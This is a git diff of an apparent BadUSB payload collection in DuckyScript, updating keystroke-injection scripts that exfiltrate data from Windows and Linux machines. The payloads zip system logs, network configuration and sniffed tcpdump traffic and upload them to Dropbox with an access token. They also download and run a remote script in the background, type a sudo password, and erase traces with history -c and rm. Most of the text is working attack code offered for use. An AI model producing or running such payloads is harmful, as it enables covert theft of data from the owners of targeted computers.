||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
REM Open Windows research
|
||||
DELAY 2000
|
||||
GUI
|
||||
DELAY 1000
|
||||
|
||||
REM Search and opern explorer app
|
||||
STRING explorer
|
||||
ENTER
|
||||
STRINGLN explorer
|
||||
DELAY 1000
|
||||
|
||||
REM Goto search bar and open "Uninstall or change a program" page
|
||||
|
|
|
@ -1,18 +1,18 @@
|
|||
REM ########################################################
|
||||
REM # #
|
||||
REM # Title : Dump Windows Memory Through ProcDump #
|
||||
REM # Author : Aleff #
|
||||
REM # Version : 1.0 #
|
||||
REM # Category : Exfiltration #
|
||||
REM # Target : Windows #
|
||||
REM # #
|
||||
REM ########################################################
|
||||
|
||||
REM_BLOCK
|
||||
########################################################
|
||||
# #
|
||||
# Title : Dump Windows Memory Through ProcDump #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration #
|
||||
# Target : Windows #
|
||||
# #
|
||||
########################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Authorization to execute powershell commands
|
||||
|
||||
|
||||
REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
|
||||
DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a
|
||||
|
||||
|
|
|
@ -1,13 +1,12 @@
|
|||
REM ###################################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Computer Screenshots |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltrate |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ###################################################
|
||||
|
||||
###################################################
|
||||
# #
|
||||
# Title : Exfiltrate Computer Screenshots #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltrate #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
###################################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
|
@ -15,12 +14,53 @@ REM - Discord Webhook (or whatever you want for the exfiltration)
|
|||
REM - ExecutionPolicy Bypass
|
||||
REM - Python
|
||||
|
||||
|
||||
REM REQUIRED - Set your Python script link
|
||||
DEFINE SCRIPT-PY-LINK example.com
|
||||
|
||||
|
||||
DELAY 1000
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
|
|
|
@ -1,11 +1,9 @@
|
|||
# Exfiltrate Linux Content With Dropbox - BADUSB ✅
|
||||
# Exfiltrate Linux Content With Dropbox
|
||||
|
||||
A script used to take folder content on Linux Systems.
|
||||
|
||||
**Category**: Exfiltration, Execution
|
||||
|
||||
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
|
||||
|
||||
## Description
|
||||
|
||||
A script used to take folder content on Linux Systems.
|
||||
|
|
|
@ -1,12 +1,10 @@
|
|||
|
||||
# Exfiltrate Linux Log Files - BADUSB ✅
|
||||
# Exfiltrate Linux Log Files
|
||||
|
||||
A script used to take linux logs.
|
||||
|
||||
**Category**: Exfiltration, Execution
|
||||
|
||||
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
|
||||
|
||||
## Description
|
||||
|
||||
A script used to take linux logs.
|
||||
|
|
|
@ -1,80 +1,93 @@
|
|||
REM ######################################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Linux Logs With Dropbox |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration, Execution |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM ######################################################
|
||||
REM_BLOCK
|
||||
######################################################
|
||||
# #
|
||||
# Title : Exfiltrate Linux Logs With Dropbox #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration, Execution #
|
||||
# Target : Linux #
|
||||
# #
|
||||
######################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - Dropbox Account
|
||||
REM - - DROPBOX_ACCESS_TOKEN
|
||||
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
|
||||
REM Required: Set here your Dropbox access TOKEN
|
||||
DELAY 2000
|
||||
DEFINE TOKEN example
|
||||
STRING ACCESS_TOKEN="
|
||||
STRING TOKEN
|
||||
STRING "
|
||||
ENTER
|
||||
DEFINE #TOKEN example
|
||||
|
||||
REM Send to Dropbox function
|
||||
DEFINE #DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
STRINGLN ACCESS_TOKEN="#TOKEN"
|
||||
|
||||
DELAY 500
|
||||
STRING USER_NAME=$(whoami)
|
||||
ENTER
|
||||
STRINGLN USER_NAME=$(whoami)
|
||||
|
||||
REM Create random num
|
||||
DELAY 500
|
||||
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
|
||||
ENTER
|
||||
STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
|
||||
|
||||
REM Folder path
|
||||
DELAY 500
|
||||
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
|
||||
ENTER
|
||||
STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
|
||||
|
||||
REM Zip path
|
||||
DELAY 500
|
||||
STRING ZIP_NAME="$RANDOM.zip"
|
||||
ENTER
|
||||
STRINGLN ZIP_NAME="$RANDOM.zip"
|
||||
DELAY 500
|
||||
STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
|
||||
ENTER
|
||||
STRINGLN ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
|
||||
|
||||
REM Default log path
|
||||
DELAY 500
|
||||
STRING LOG_PATH="/var/log/"
|
||||
ENTER
|
||||
STRINGLN LOG_PATH="/var/log/"
|
||||
|
||||
DELAY 500
|
||||
STRING zip -r "$ZIP_PATH" "$LOG_PATH"
|
||||
ENTER
|
||||
STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH"
|
||||
|
||||
REM Delay of zipping operation - it depends
|
||||
DELAY 10000
|
||||
|
||||
DELAY 500
|
||||
STRING DROPBOX_FOLDER="/$ZIP_NAME"
|
||||
ENTER
|
||||
STRINGLN DROPBOX_FOLDER="/$ZIP_NAME"
|
||||
|
||||
REM Send to Dropbox function
|
||||
DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
|
||||
DELAY 500
|
||||
STRING curl -X POST
|
||||
STRING DROPBOX_API_LINK
|
||||
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
|
||||
ENTER
|
||||
STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
|
||||
|
||||
REM Send timing - it depends
|
||||
DELAY 5000
|
||||
|
||||
DELAY 500
|
||||
STRING rm -rf "$TMP_FOLDER_PATH"
|
||||
ENTER
|
||||
STRINGLN rm -rf "$TMP_FOLDER_PATH"
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
|
||||
# Exfiltrate Network Configuration - Linux ✅
|
||||
# Exfiltrate Network Configuration - Linux
|
||||
|
||||
A script used to exfiltrate the network configuration on a Linux machine.
|
||||
|
||||
|
|
|
@ -1,96 +1,101 @@
|
|||
|
||||
REM ##########################################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Linux Network Configuration |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration, Execution |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM ##########################################################
|
||||
REM_BLOCK
|
||||
##########################################################
|
||||
# #
|
||||
# Title : Exfiltrate Linux Network Configuration #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration, Execution #
|
||||
# Target : Linux #
|
||||
# #
|
||||
##########################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - Dropbox Account
|
||||
REM - - DROPBOX_ACCESS_TOKEN
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
|
||||
DELAY 2000
|
||||
REM Required: Set here your Dropbox access TOKEN
|
||||
DEFINE TOKEN example
|
||||
STRING ACCESS_TOKEN="
|
||||
STRING TOKEN
|
||||
STRING "
|
||||
ENTER
|
||||
DEFINE #TOKEN example
|
||||
|
||||
REM DELAY 500
|
||||
REM STRING USER_NAME=$(whoami)
|
||||
REM ENTER
|
||||
REM Set yout Dropbox folder name
|
||||
DEFINE #DROPBOX_FOLDER_NAME example
|
||||
|
||||
REM This is just a Dropbox const, don't edit
|
||||
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
STRINGLN ACCESS_TOKEN="#TOKEN"
|
||||
|
||||
DELAY 500
|
||||
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
|
||||
ENTER
|
||||
STRINGLN USER_NAME=$(whoami)
|
||||
|
||||
DELAY 500
|
||||
STRING ZIP_NAME="$RANDOM.zip"
|
||||
ENTER
|
||||
STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
|
||||
|
||||
DELAY 500
|
||||
STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
|
||||
ENTER
|
||||
STRINGLN ZIP_NAME="$RANDOM.zip"
|
||||
DELAY 500
|
||||
STRINGLN ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
|
||||
|
||||
REM Folder path
|
||||
DELAY 500
|
||||
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
|
||||
ENTER
|
||||
STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
|
||||
|
||||
DELAY 500
|
||||
STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
|
||||
ENTER
|
||||
STRINGLN nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
|
||||
|
||||
DELAY 1000
|
||||
STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
|
||||
ENTER
|
||||
STRINGLN nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
|
||||
|
||||
DELAY 1000
|
||||
STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
|
||||
ENTER
|
||||
STRINGLN nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
|
||||
|
||||
DELAY 1000
|
||||
REM Delay for zipping operation, it depends by computer power and folder directory
|
||||
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
|
||||
DELAY 3000
|
||||
|
||||
|
||||
REM Set yout Dropbox folder name
|
||||
DEFINE DROPBOX_FOLDER_NAME example
|
||||
STRING DROPBOX_FOLDER="/
|
||||
ENTER
|
||||
STRING DROPBOX_FOLDER_NAME
|
||||
ENTER
|
||||
STRING "
|
||||
ENTER
|
||||
STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
|
||||
DELAY 500
|
||||
|
||||
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||
STRING curl -X POST
|
||||
STRING DROPBOX_API_CONST
|
||||
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
|
||||
ENTER
|
||||
|
||||
STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
|
||||
|
||||
DELAY 2000
|
||||
STRING history -c
|
||||
ENTER
|
||||
STRINGLN history -c
|
||||
|
||||
DELAY 500
|
||||
STRING rm -rf "$TMP_FOLDER_PATH"
|
||||
ENTER
|
||||
STRINGLN rm -rf "$TMP_FOLDER_PATH"
|
||||
|
||||
DELAY 500
|
||||
STRING rm -rf "$ZIP_PATH"
|
||||
ENTER
|
||||
|
||||
DELAY 500
|
||||
STRING exit
|
||||
ENTER
|
||||
STRINGLN rm -rf "$ZIP_PATH"; exit
|
|
@ -1,57 +1,76 @@
|
|||
|
||||
REM #############################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Network Traffic |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM #############################################
|
||||
REM_BLOCK
|
||||
#############################################
|
||||
# #
|
||||
# Title : Exfiltrate Network Traffic #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration #
|
||||
# Target : Linux #
|
||||
# #
|
||||
#############################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Permissions
|
||||
REM - Internet Connection
|
||||
|
||||
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
||||
DEFINE SUDO_PASS example
|
||||
DEFINE #SUDO_PASS example
|
||||
|
||||
REM REQUIRED: Set what you want to sniff, for example tcp port 80
|
||||
DEFINE SNIFFING example
|
||||
DEFINE #SNIFFING example
|
||||
|
||||
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
|
||||
DEFINE TOKEN example
|
||||
DEFINE #TOKEN example
|
||||
|
||||
REM Just a Dropbox const
|
||||
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||
|
||||
REM Output file path packets.pcap, remember to use pcap extension
|
||||
DEFINE FILE example.pcap
|
||||
DEFINE #FILE example.pcap
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### PERMISSIONS SECTION ####
|
||||
|
||||
|
||||
STRINGLN sudo su
|
||||
DELAY 1000
|
||||
STRINGLN SUDO_PASS
|
||||
STRINGLN #SUDO_PASS
|
||||
DELAY 1000
|
||||
|
||||
|
||||
REM #### Network Traffic SECTION ####
|
||||
|
||||
|
||||
STRING FILE_PATH="
|
||||
STRING FILE
|
||||
STRING "
|
||||
ENTER
|
||||
STRINGLN FILE_PATH="#FILE"
|
||||
DELAY 500
|
||||
|
||||
STRING filter_expression="
|
||||
STRING SNIFFING
|
||||
STRING "
|
||||
ENTER
|
||||
STRINGLN filter_expression="#SNIFFING"
|
||||
DELAY 500
|
||||
|
||||
REM Network card name
|
||||
|
@ -71,28 +90,18 @@ DELAY 60000
|
|||
REM Kill the process by PID
|
||||
STRINGLN kill $tcpdump_pid
|
||||
|
||||
|
||||
REM #### Exfiltrate SECTION ####
|
||||
REM You can use whatever you want, i use Dropbox
|
||||
|
||||
STRING ACCESS_TOKEN="
|
||||
STRING TOKEN
|
||||
STRING "
|
||||
ENTER
|
||||
STRINGLN ACCESS_TOKEN="#TOKEN"
|
||||
DELAY 500
|
||||
|
||||
STRINGLN DROPBOX_FOLDER="/Exfiltration"
|
||||
DELAY 500
|
||||
|
||||
STRING curl -X POST
|
||||
STRING DROPBOX_API_CONST
|
||||
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
|
||||
ENTER
|
||||
|
||||
STRINGLN curl -X POST#DROPBOX_API_CONST--header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
|
||||
|
||||
REM #### REMOVE TRACES ####
|
||||
|
||||
|
||||
STRINGLN rm "$FILE_PATH"
|
||||
DELAY 500
|
||||
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
|
||||
REM ##################################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Photos Through Shell |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM ##################################################
|
||||
REM_BLOCK
|
||||
##################################################
|
||||
# #
|
||||
# Title : Exfiltrate Photos Through Shell #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration #
|
||||
# Target : Linux #
|
||||
# #
|
||||
##################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
|
@ -17,49 +18,63 @@ REM - if you need to install 'fswebcam'
|
|||
REM - for add the -x permission to the script.sh downloaded
|
||||
|
||||
REM REQUIRED - replace example.com with your script.sh link
|
||||
DEFINE SCRIPT-SH-LINK example.com
|
||||
DEFINE #SCRIPT-SH-LINK example.com
|
||||
|
||||
REM REQUIRED - sudo Password
|
||||
DEFINE SUDO-PSWD example
|
||||
DEFINE #SUDO-PSWD example
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### Permission ####
|
||||
|
||||
REM This section of sudo time depends by the computer power on which it runs.
|
||||
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
|
||||
|
||||
STRING sudo su
|
||||
ENTER
|
||||
STRINGLN sudo su
|
||||
DELAY 500
|
||||
STRING SUDO-PSWD
|
||||
ENTER
|
||||
STRINGLN #SUDO-PSWD
|
||||
REM DELAY Based On Computer Power
|
||||
DELAY 5000
|
||||
|
||||
REM If you want to install the dependency of fswebcam you should decommend it.
|
||||
REM STRING apt install fswebcam -y
|
||||
REM ENTER
|
||||
REM STRINGLN apt install fswebcam -y
|
||||
REM DELAY Based On Internet Power
|
||||
REM DELAY 5000
|
||||
|
||||
|
||||
REM #### Script ####
|
||||
|
||||
|
||||
STRING curl
|
||||
STRING SCRIPT-SH-LINK
|
||||
STRING > script.sh
|
||||
ENTER
|
||||
STRINGLN curl #SCRIPT-SH-LINK > script.sh
|
||||
REM DELAY Based On Internet Power
|
||||
DELAY 4000
|
||||
|
||||
STRING chmod +x script.sh
|
||||
ENTER
|
||||
STRINGLN chmod +x script.sh
|
||||
DELAY 500
|
||||
|
||||
STRING nohup ./script.sh > /dev/null 2>&1 & exit
|
||||
ENTER
|
||||
STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit
|
|
@ -1,73 +1,79 @@
|
|||
|
||||
REM ##########################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Process Info |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM ##########################################
|
||||
REM_BLOCK
|
||||
##########################################
|
||||
# #
|
||||
# Title : Exfiltrate Process Info #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration #
|
||||
# Target : Linux #
|
||||
# #
|
||||
##########################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - Discord Webhook
|
||||
|
||||
DELAY 1000
|
||||
REM Set yout Dropbox folder name
|
||||
DEFINE #DROPBOX_FOLDER_NAME example
|
||||
|
||||
REM This is just a Dropbox const, don't edit
|
||||
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### GET PROCESS SECTION ####
|
||||
|
||||
|
||||
STRING ps aux > process.txt
|
||||
ENTER
|
||||
STRINGLN ps aux > process.txt
|
||||
DELAY 500
|
||||
|
||||
|
||||
REM #### EXFILTRATE SECTION ####
|
||||
|
||||
|
||||
REM Required: Set here your Dropbox access TOKEN
|
||||
DEFINE TOKEN example
|
||||
STRING ACCESS_TOKEN="
|
||||
STRING TOKEN
|
||||
STRING "
|
||||
ENTER
|
||||
STRINGLN ACCESS_TOKEN="#TOKEN"
|
||||
DELAY 500
|
||||
|
||||
STRING USER_NAME=$(whoami)
|
||||
ENTER
|
||||
STRINGLN USER_NAME=$(whoami)
|
||||
DELAY 500
|
||||
|
||||
STRING TXT_PATH="/home/$USER_NAME/process.txt"
|
||||
ENTER
|
||||
STRINGLN TXT_PATH="/home/$USER_NAME/process.txt"
|
||||
DELAY 500
|
||||
|
||||
REM Set yout Dropbox folder name
|
||||
DEFINE DROPBOX_FOLDER_NAME example
|
||||
STRING DROPBOX_FOLDER="/
|
||||
